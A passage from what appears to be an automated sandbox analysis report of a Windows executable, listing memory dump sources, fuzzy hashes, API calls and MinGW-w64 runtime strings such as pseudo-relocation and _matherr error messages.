                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentEntryFunctionLookupTerminateUnwindVirtualabort
                                    • String ID:
                                    • API String ID: 4278921479-0
                                    • Opcode ID: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
                                    • Instruction ID: cf336b0ec7d2cb6baae35a739632777ca23f94a65b3f666190a75c6fcbb7d788
                                    • Opcode Fuzzy Hash: 27e43dfa7ef0e7d63c314b0127c2fc61b110ad3033d9dc91a01dad9a926d3ef7
                                    • Instruction Fuzzy Hash: B5210FB5202F45E9EB009B61F98438A33B4BB08B88F40452ADF8E27775EF38C519C708

                                    Control-flow Graph

                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32 ref: 004019D5
                                    • GetCurrentProcessId.KERNEL32 ref: 004019E0
                                    • GetCurrentThreadId.KERNEL32 ref: 004019E8
                                    • GetTickCount.KERNEL32 ref: 004019F0
                                    • QueryPerformanceCounter.KERNEL32 ref: 004019FE
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                    • String ID:
                                    • API String ID: 1445889803-0
                                    • Opcode ID: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
                                    • Instruction ID: 088ae4e322ac71afa1741572681cd55a149c1471ea95f8004f9c9491386c013f
                                    • Opcode Fuzzy Hash: 180d7ae7fc5b59493381c36575e32c3318445472d573a77b1124f7da9349a765
                                    • Instruction Fuzzy Hash: AA1170A6756B1092FB209B25F90431973A0B788BF4F081A759F9D53BB4DA3CC986C708
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                                    • Instruction ID: 040a81dcf2f050336bda00ad6163e1b97f4a0e7d9bd373c2026e90d71216a3c6
                                    • Opcode Fuzzy Hash: 3943532f7ff775f6c9632ad134db5b43a8581d7d914136b19b322c0d495756f2
                                    • Instruction Fuzzy Hash: 4DD0C7D7F5DFD096D32281A40CB60593F91B4F291031E80AF4E40A33D3741C1C055315
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
                                    • Instruction ID: 82f505fb4451acb9e8d1e12f81e5a21f5fcc3540fe401e05c5c992db50528185
                                    • Opcode Fuzzy Hash: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
                                    • Instruction Fuzzy Hash: 62A0029244DD0290E3101B40D9413A07279D306240F0424A6421461072853D8520414C

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph: basic blocks 401d50-402300; API calls VirtualQuery, VirtualProtect, GetLastError; internal calls 401d50, 401dc0, 402b20, 402bb0, 402c50, 402dd0, 402e10, 402e48, 402e70, 402ec0
                                    APIs
                                    Strings
                                    • Mingw-w64 runtime failure:, xrefs: 00401D88
                                    • Address %p has no image-section, xrefs: 00401DC0
                                    • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                    • VirtualProtect failed with code 0x%x, xrefs: 00401F56
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: QueryVirtual
                                    • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                    • API String ID: 1804819252-1534286854
                                    • Opcode ID: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
                                    • Instruction ID: 10d76aa513752d408286ffc26ec959f6f169e193d9772deefbdc98a11bb0eab9
                                    • Opcode Fuzzy Hash: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
                                    • Instruction Fuzzy Hash: 2C51DFB2701B4086DB109F26E94475E77A1F799BA4F58423AEF98233E1EA3CC485C748

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph: basic blocks 4025e0-402788; API call signal (four call sites)
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: signal
                                    • String ID: CCG
                                    • API String ID: 1946981877-1584390748
                                    • Opcode ID: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
                                    • Instruction ID: 8a37928041284c8a434aeccdd4db6f983c568c8f0cf3e4f2934023fa32f313ab
                                    • Opcode Fuzzy Hash: 02ca0884ae1087a20c21e45c5c541f93375eef4ab3a09d0df9e107311897ccd7
                                    • Instruction Fuzzy Hash: C321A171B0154146EE296279865D33B10019B9A374F284E379A3DA73E0DEFECCC2830E

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph: basic blocks 401fd0-402300; API call VirtualProtect; internal calls 401d50, 401dc0, 402bb0, 402dd0
                                    Strings
                                    • Unknown pseudo relocation bit size %d., xrefs: 00402294
                                    • Unknown pseudo relocation protocol version %d., xrefs: 004022A8
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.
                                    • API String ID: 0-395989641
                                    • Opcode ID: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
                                    • Instruction ID: 42e0c3400c77c9dd47adb4fdb8995eb2357067ceb312bbd9be83e7c2f840df7f
                                    • Opcode Fuzzy Hash: 8caf0c066df89f6cee4c07a50155e792156557ee52966e310dcb16b3cca200fb
                                    • Instruction Fuzzy Hash: 6A712272B10B9486DF10CF61DA0875A7761FB58BA8F58862ADF08377E8DB7DC540CA08

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph: basic blocks 401dc0-402300; API calls VirtualQuery, VirtualProtect, GetLastError; internal calls 401d50, 401dc0, 402b20, 402bb0, 402c50, 402dd0
                                    APIs
                                    Strings
                                    • Address %p has no image-section, xrefs: 00401DC0, 00401FA5
                                    • VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: QueryVirtual
                                    • String ID: VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
                                    • API String ID: 1804819252-157664173
                                    • Opcode ID: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
                                    • Instruction ID: 52aafb0f448170306d42bca5540912cc2139dda9d14def77d71a33c16101a6f6
                                    • Opcode Fuzzy Hash: 24b42db9420a0036ba5551ca2cf6389df1f73159e8ba1386f4a30517d06c5471
                                    • Instruction Fuzzy Hash: 4B31E3B3702A4195EF118F12EA4175A3761BB95BA4F49413AEF4C273A1EF3CD486C788
                                    APIs
                                    Strings
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    • Unknown error, xrefs: 00401D2C
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000002.00000002.1877424493.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877450003.0000000000404000.00000004.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877462804.0000000000405000.00000002.00000001.01000000.00000008.sdmp
                                    • Associated: 00000002.00000002.1877475767.0000000000409000.00000004.00000001.01000000.00000008.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_400000_tmpE651.jbxd
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    APIs
                                    Strings
                                    • Argument domain error (DOMAIN), xrefs: 00401CE0
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    APIs
                                    Strings
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    • Partial loss of significance (PLOSS), xrefs: 00401CF0
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    APIs
                                    Strings
                                    • Overflow range error (OVERFLOW), xrefs: 00401D00
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    APIs
                                    Strings
                                    • The result is too small to be represented (UNDERFLOW), xrefs: 00401D10
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    APIs
                                    Strings
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    • Total loss of significance (TLOSS), xrefs: 00401D20
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                    APIs
                                    Strings
                                    • Argument singularity (SIGN), xrefs: 00401C78
                                    • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 00401CA7
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1877437229.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                    Similarity
                                    • API ID: fprintf
                                    • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)